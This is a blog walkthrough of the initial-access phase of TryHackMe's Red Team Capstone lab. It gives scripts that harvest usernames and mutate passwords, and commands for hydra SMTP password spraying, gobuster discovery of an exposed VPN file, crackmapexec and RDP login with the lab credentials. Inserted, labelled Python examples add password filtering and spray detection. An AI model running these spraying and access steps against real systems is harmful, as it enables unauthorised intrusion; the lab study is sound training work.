
TryHackMe Red Team Capstone Walkthrough, Part I: Initial Access

6 min read · Sep 6, 2025

TL;DR walkthrough of the Red Team Capstone network on TryHackMe. This is Part I: Initial Access.

THM Walkthroughs:

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Our Red Team Capstone Walkthrough Series

There are four parts to this walkthrough of the Red Team Capstone due to the sheer size of the network:

I will add a link to the last part once I post it. Currently it only exists in raw notes and screenshots.

Background

Overall I really liked this room. It’s one of the largest networks on TryHackMe, if not the largest by sheer VM count. There are 14 VMs in the Red Team Capstone in total; however, it is important to bear in mind that you do not have to compromise all of them to finish the room. The end goal of the Red Team Capstone is to

  • Gain initial access to the internal domain
  • Enumerate, escalate privileges, and move through the forest until finally
  • Gaining access to the internal banking application.

Executing a “fraudulent” transaction on the banking application is the demonstration of impact and the end of the exercise.

On an admin note, bear in mind that the room is shared. Other TryHackMe users may be using the VMs at any given time. Hence you may get logged out of an RDP session on a VM because another THM user just connected using the same username you were. This happened to me once during my time completing this room. I simply worked on something else and came back later.

Also note that all the VMs use the same first 3 octets in their IP address. I didn’t put any flags in until the end, so my diagram looked like this the entire time. You may get different IPs when you do this room, however only the first 3 octets might change for you. The last octet is static.


I just ran the query

Get-ADComputer -Filter * -Properties * | Select-Object CN, IPv4Address

every time I gained a foothold in another domain, then jotted down the hostnames and corresponding IPs in my notes.

As you might guess from the diagram, the room has

  • A parent domain
  • Two child domains
  • Three public facing servers
  • One internal web application that’s not joined to AD

I got some hints from Kesaya’s excellent Red Team Capstone writeup here while working on gaining initial access. Hence I feel it’s important to cite them.

Enumeration

I didn’t use nmap at all in the Red Team Capstone; after all, the diagram lets you know which three servers are available and what their roles are. Luckily I did not have to screw with any webapps to get initial access, as I suck at webapps. I simply poked and prodded looking for

  • A list of usernames to try
  • A list of passwords to try
  • Method of gaining internal access

The webserver has a ‘Contact Us’ page. This page has an email address that lets us know the format: applications@corp.thereserve.loc


The webserver also has a ‘Meet The Team’ page. Look at the source code of the page and you will notice that every image on that page has the file format ‘firstname.lastname.jpeg’. That looks an awful lot like their usernames, doesn’t it?

I saved that webpage’s source to ‘meettheteam.txt’ and then whipped up two functions:

Generate-Usernames.ps1

# Pull firstname.lastname out of every image filename and de-duplicate
Get-Content .\meettheteam.txt |
    Select-String -Pattern '([a-z]+\.[a-z]+)\.jpeg' -AllMatches |
    ForEach-Object {
        $_.Matches.Value -replace '\.jpeg',''
    } | Sort-Object -Unique |
    Set-Content usernames.txt

Generate-Emails.ps1

# Append the mail domain seen on the 'Contact Us' page to each username
$Lines = Get-Content .\usernames.txt
ForEach($Line in $Lines)
{
    $Line + '@corp.thereserve.loc' | Out-File .\emails.txt -Append
}

Great, now we have a list of usernames and another of email addresses. We just need passwords to try spraying.

The room materials give you a password base list and let you know to add 1 number and 1 special character from ‘!@#$%’ to the end of each base.

Generate-Passwords.ps1

# Each base word gets one digit (0-9) and one symbol from '!@#$%' appended
Get-Content .\capstone-challenge-resources-1682449700926\Capstone_Challenge_Resources\password_base_list.txt | ForEach-Object {
    foreach ($n in 0..9) {
        foreach ($s in '!','@','#','$','%') {
            "$_${n}${s}"
        }
    }
} | Set-Content .\mutated.txt
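
Added example, not part of the original walkthrough or the room's materials: the defensive counterpart to this mutation rule is a password filter that strips the trailing digit/symbol run before checking a deny-list, sketched here in Python. The `BANNED_BASES` entries, the function names and the username check are assumptions made for illustration.

```python
import re

# Assumed deny-list: constructed sample words, not the room's password_base_list.txt.
BANNED_BASES = {"password", "welcome", "thereserve"}

# Trailing digits/symbols appended to a base word to satisfy complexity rules.
TRAILING = re.compile(r"[\d\W_]+$")


def core(candidate: str) -> str:
    """Lower-case the candidate and strip its trailing digit/symbol run."""
    return TRAILING.sub("", candidate.lower())


def rejection_reasons(candidate: str, username: str, banned=BANNED_BASES) -> list:
    """Return why a filter should refuse the candidate (empty list = accept)."""
    reasons = []
    stem = core(candidate)
    # 'Password1!' and 'Password7%' both reduce to the same banned stem.
    if stem in banned:
        reasons.append("banned-base")
    # firstname.lastname accounts: refuse passwords built on either name part.
    parts = [p for p in re.split(r"[._\-]", username.lower()) if len(p) >= 3]
    if any(p in stem for p in parts):
        reasons.append("contains-username")
    return reasons


if __name__ == "__main__":
    # Constructed candidates; the usernames are the two from this walkthrough.
    for pw, user in [("Password1!", "mohammad.ahmed"),
                     ("Ahmed2024#", "mohammad.ahmed"),
                     ("correct horse battery staple", "laura.wood")]:
        print(f"{pw!r:35} {user:16} {rejection_reasons(pw, user) or 'accept'}")
```

A complexity rule alone accepts every password in mutated.txt; comparing the stripped stem against the deny-list is what removes them.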

I was now ready to take our generated usernames and passwords and spray:

hydra -L emails.txt -P mutated.txt 10.200.89.11 smtp

I got two hits:

laura.wood \ Password1@

mohammad.ahmed \ Password1!
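
Added example, not part of the original walkthrough: what this spray looks like from the mail server's side, as Python detection logic that flags a source failing authentication for many distinct accounts in a short window and lists the accounts it then logged in to. The log format, sample lines, addresses and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format and sample events, constructed for this example.
LINE = re.compile(r"^(\S+) smtp-auth result=(OK|FAIL) user=(\S+) src=(\S+)$")
SAMPLE_LOG = """\
2025-09-06T10:00:01 smtp-auth result=FAIL user=user.one@corp.example src=203.0.113.7
2025-09-06T10:00:02 smtp-auth result=FAIL user=user.two@corp.example src=203.0.113.7
2025-09-06T10:00:03 smtp-auth result=OK user=user.three@corp.example src=203.0.113.7
2025-09-06T10:00:04 smtp-auth result=FAIL user=user.four@corp.example src=203.0.113.7
2025-09-06T10:00:05 smtp-auth result=FAIL user=user.five@corp.example src=203.0.113.7
2025-09-06T10:02:00 smtp-auth result=FAIL user=user.six@corp.example src=198.51.100.20
2025-09-06T10:02:09 smtp-auth result=FAIL user=user.six@corp.example src=198.51.100.20
2025-09-06T10:02:30 smtp-auth result=OK user=user.six@corp.example src=198.51.100.20
"""


def parse(log):
    events = []  # (timestamp, result, user, source) tuples
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if m:
            ts, result, user, src = m.groups()
            events.append((datetime.fromisoformat(ts), result, user.lower(), src))
    return sorted(events)


def detect_spray(events, min_users=4, window=timedelta(minutes=5)):
    """Map each spraying source to the accounts it authenticated as."""
    fails = defaultdict(list)  # source -> [(timestamp, user)] of failures
    for ts, result, user, src in events:
        if result == "FAIL":
            fails[src].append((ts, user))
    flagged = {}
    for src, items in fails.items():
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            # Many distinct users failing from one source is the spray signature.
            if len({u for _, u in items[start:end + 1]}) >= min_users:
                flagged[src] = sorted({u for _, r, u, s in events if s == src and r == "OK"})
                break
    return flagged


if __name__ == "__main__":
    print(detect_spray(parse(SAMPLE_LOG)))
```

The second source retries one mailbox and is not flagged; counting distinct users rather than raw failures is what separates a spray from a mistyped password.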

How do we get access to the internal network though? I found a *.ovpn file left publicly accessible when I tried running GoBuster against the VPN server.

gobuster dir -u http://10.200.89.12 -w /home/kali/Downloads/SecLists-master/Discovery/Web-Content/big.txt

I downloaded the corpUsername.ovpn file from http://10.200.89.12/vpn and opened it.

mousepad ../RedTeam/corpUsername.ovpn

Notice that line 6 has the IP ‘10.200.X.X’. I simply changed that to the VPN server’s IP in the diagram: 10.200.89.12.

Access the internal network

Then I connected.

sudo openvpn ../RedTeam/corpUsername.ovpn

I enumerated what changed after connecting.

ifconfig

route

Interesting, we are now connected to two networks over OpenVPN and the new one lists two IP addresses.

I saved 10.200.89.21 & 10.200.89.22 in IPs.txt and then tried the credentials we found against them. Remember the format for the email address we found on the webserver? That’s how to know what domain to try.

crackmapexec smb IPs.txt -u mohammad.ahmed -p 'Password1!' -d corp.thereserve.loc --continue-on-success

Foothold on a domain workstation

I connected to the first IP via RDP.

xfreerdp /u:mohammad.ahmed /p:'Password1!' +clipboard /dynamic-resolution /cert:ignore /v:10.200.89.21 /drive:share,/home/kali/Downloads/RedTeam

We have initial access to the internal domain as a Domain User.

Summary

This was a really good exercise in performing enumeration on public facing systems and putting together username and password lists for spraying. I give the room’s author a lot of credit here. Overall this was a really, really good room IMHO. I rate it much higher than I do the PT1 exam in fact.

Again, I’d like to thank Kesaya for their excellent writeup that has excellent hints.

This ends Part I: Gaining Initial Access. Part II: Escalating to Domain Admin in corp.thereserve.loc is next.

References

Kesaya’s writeup: https://7168674.fs1.hubspotusercontent-na1.net/hubfs/7168674/Red%20Team%20Capstone%20Network%20-%20Kesaya%20Write-Up.pdf

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.
